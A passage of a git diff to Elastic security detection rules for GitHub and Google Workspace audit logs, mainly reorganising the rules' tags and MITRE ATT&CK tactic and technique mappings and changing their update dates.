rule_id = "fb0afac5-bbd6-49b0-b4f8-44e5381e1587" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Tactic: Collection", "Tactic: Exfiltration", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Execution", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "threshold" @@ -65,29 +72,17 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.threshold] field = ["github.hashed_token"] value = 1 diff --git a/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml b/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml index 14f7d975ce4..1bd5931c41a 100644 --- a/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml +++ b/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2023/12/14" maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -70,6 +70,14 @@ signal.rule.tags:("Use Case: UEBA" and "Data Source: Github") and kibana.alert.w ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.threshold] field = ["user.name"] value = 1 diff --git a/rules/integrations/github/execution_new_github_app_installed.toml b/rules/integrations/github/execution_new_github_app_installed.toml index 3494dfa9a97..d7a9a7fb68d 100644 --- a/rules/integrations/github/execution_new_github_app_installed.toml +++ b/rules/integrations/github/execution_new_github_app_installed.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -55,7 +55,13 @@ GitHub Apps enhance functionality by integrating with repositories and organizat risk_score = 47 rule_id = "1ca62f14-4787-4913-b7af-df11745a49da" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -66,13 +72,14 @@ configuration where event.dataset == "github.audit" and event.action == "integra [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1072" +name = "Software Deployment Tools" +reference = "https://attack.mitre.org/techniques/T1072/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml b/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml index 9a1b9aa5c52..13367f9a56f 100644 --- a/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml +++ b/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/04" [rule] author = ["Elastic"] @@ -50,7 +50,14 @@ This rule flags when a previously private repository is made public, a high-risk risk_score = 21 rule_id = "8c707e4c-bd20-4ff4-bda5-4dc3b34ce298" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Exfiltration", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Tactic: Impact", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -61,6 +68,11 @@ event.action == "repo.access" and github.previous_visibility == "private" and gi [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" @@ -75,3 +87,11 @@ reference = "https://attack.mitre.org/techniques/T1567/001/" id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml index 32b3e7e8da2..b0f024d3a6b 100644 --- a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml +++ b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] @@ -54,7 +54,13 @@ references = [ risk_score = 47 rule_id = "19f3674c-f4a1-43bb-a89c-e4c6212275e0" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Exfiltration", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -84,29 +90,21 @@ from logs-github.audit-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" - -[[rule.threat.technique.subtechnique]] -id = "T1213.003" -name = "Code Repositories" -reference = "https://attack.mitre.org/techniques/T1213/003/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1020" name = "Automated Exfiltration" reference = "https://attack.mitre.org/techniques/T1020/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.001" +name = "Exfiltration to Code Repository" +reference = "https://attack.mitre.org/techniques/T1567/001/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml index 210386f4349..46b687e9fdb 100644 --- a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml +++ b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/16" [rule] author = ["Elastic"] @@ -24,7 +24,15 @@ references = [ risk_score = 21 rule_id = "daf2e0e0-0bab-4672-bfa1-62db0ee5ec22" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Collection", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Initial Access", + "Tactic: Persistence", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -34,20 +42,42 @@ event.dataset:"github.audit" and event.action:("git.push" or "git.clone") and gi [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" [[rule.threat.technique.subtechnique]] -id = "T1213.003" -name = "Code Repositories" -reference = "https://attack.mitre.org/techniques/T1213/003/" +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["source.ip", "github.repo"] diff --git a/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml b/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml index 7bd22d1ff22..56e1f025d29 100644 --- a/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml +++ b/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] @@ -54,7 +54,14 @@ references = [ risk_score = 47 rule_id = "098bd5cc-fd55-438f-b354-7d6cd9856a08" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Exfiltration", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -87,16 +94,34 @@ from logs-github.audit-* metadata _id, _index, _version framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" - -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.001" +name = "Exfiltration to Code Repository" +reference = "https://attack.mitre.org/techniques/T1567/001/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml b/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml index 107dfb8e0bc..3273c4e208e 100644 --- a/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml +++ b/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] @@ -55,7 +55,14 @@ references = [ risk_score = 47 rule_id = "8bd1c36a-2c4f-4801-a43d-ba696c13ffc2" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Exfiltration", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -88,16 +95,34 @@ from logs-github.audit-* metadata _id, _index, _version framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" - -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.001" +name = "Exfiltration to Code Repository" +reference = "https://attack.mitre.org/techniques/T1567/001/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml b/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml index b7651ea38de..46a8c27fb5d 100644 --- a/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml +++ b/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml @@ -4,7 +4,7 @@ integration = ["github"] maturity = "production" min_stack_comments = "mv_contains ES|QL function only available post 9.2 in tech preview" min_stack_version = "9.2.0" -updated_date = "2026/03/23" +updated_date = "2026/01/27" [rule] author = ["Elastic"] @@ -57,7 +57,14 @@ references = [ risk_score = 47 rule_id = "0428c618-27f5-4d94-99e6-b254585aba69" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Exfiltration", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -96,17 +103,30 @@ id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + [[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" [[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" +id = "T1567.001" +name = "Exfiltration to Code Repository" +reference = "https://attack.mitre.org/techniques/T1567/001/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml index 6d017e6ec64..59d99cbea86 100644 --- a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml +++ b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/09" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/09" [rule] author = ["Elastic"] @@ -65,7 +65,14 @@ references = [ risk_score = 21 rule_id = "03245b25-3849-4052-ab48-72de65a82c35" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Initial Access", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Persistence", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -77,39 +84,32 @@ event.dataset: "github.audit" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" - -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" - [[rule.threat.technique.subtechnique]] -id = "T1195.001" -name = "Compromise Software Dependencies and Development Tools" -reference = "https://attack.mitre.org/techniques/T1195/001/" +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["github.org_id", "github.repo"] diff --git a/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml b/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml index 4e702825bc4..15f2ba57bd8 100644 --- a/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml +++ b/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/05" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/05" [rule] author = ["Elastic"] @@ -58,7 +58,15 @@ references = ["https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attac risk_score = 47 rule_id = "e8b37f18-4804-4819-8602-4aba1169c9f4" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -76,30 +84,41 @@ from logs-github.audit-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" - [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml b/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml index 9b48a818df9..5b6539b9114 100644 --- a/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml +++ b/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/28" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/09" [rule] author = ["Elastic"] @@ -73,21 +73,23 @@ event.dataset:"github.audit" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" - [[rule.threat.technique.subtechnique]] -id = "T1195.001" -name = "Compromise Software Dependencies and Development Tools" -reference = "https://attack.mitre.org/techniques/T1195/001/" +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + + [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.actor_ip"] diff --git a/rules/integrations/github/persistence_github_org_owner_added.toml b/rules/integrations/github/persistence_github_org_owner_added.toml index 1d8e0678699..6ebccba2979 100644 --- a/rules/integrations/github/persistence_github_org_owner_added.toml +++ b/rules/integrations/github/persistence_github_org_owner_added.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -54,7 +54,14 @@ GitHub organizations allow collaborative management of repositories, where the ' risk_score = 47 rule_id = "24401eca-ad0b-4ff9-9431-487a8e183af9" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Persistence", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -65,36 +72,19 @@ iam where event.dataset == "github.audit" and event.action == "org.add_member" a [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" [[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" +id = "T1136.003" +name = "Cloud Account" +reference = "https://attack.mitre.org/techniques/T1136/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/github/persistence_new_pat_created.toml b/rules/integrations/github/persistence_new_pat_created.toml index 1b24e4314f7..ff972644a35 100644 --- a/rules/integrations/github/persistence_new_pat_created.toml +++ b/rules/integrations/github/persistence_new_pat_created.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] @@ -54,7 +54,14 @@ references = [ risk_score = 21 rule_id = "214d4e03-90b0-4813-9ab6-672b47158590" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -66,16 +73,29 @@ github.category == "personal_access_token" and event.action == "personal_access_ framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" [[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" +id = "T1136.003" +name = "Cloud Account" +reference = "https://attack.mitre.org/techniques/T1136/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/github/persistence_organization_owner_role_granted.toml b/rules/integrations/github/persistence_organization_owner_role_granted.toml index b32268406c6..c8b2b1f0fc5 100644 --- a/rules/integrations/github/persistence_organization_owner_role_granted.toml +++ b/rules/integrations/github/persistence_organization_owner_role_granted.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -52,7 +52,14 @@ In GitHub organizations, the owner role grants comprehensive administrative priv risk_score = 47 rule_id = "9b343b62-d173-4cfd-bd8b-e6379f964ca4" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Persistence", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -63,36 +70,19 @@ iam where event.dataset == "github.audit" and event.action == "org.update_member [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml index 05da7b7543b..8b50df9d34a 100644 --- a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml +++ b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/24" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -84,7 +84,12 @@ references = [ risk_score = 47 rule_id = "07b5f85a-240f-11ed-b3d9-f661ea17fbce" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: Google Workspace", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -96,13 +101,19 @@ event.dataset:"google_workspace.admin" and event.action:"CREATE_DATA_TRANSFER_RE [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" +[[rule.threat.technique.subtechnique]] +id = "T1074.002" +name = "Remote Data Staging" +reference = "https://attack.mitre.org/techniques/T1074/002/" + + [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml index cb72f43152f..36138972133 100644 --- a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml +++ b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/21" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -80,7 +80,13 @@ references = [ risk_score = 73 rule_id = "980b70a0-c820-11ed-8799-f661ea17fbcc" severity = "high" -tags = ["Domain: Cloud", "Tactic: Collection", 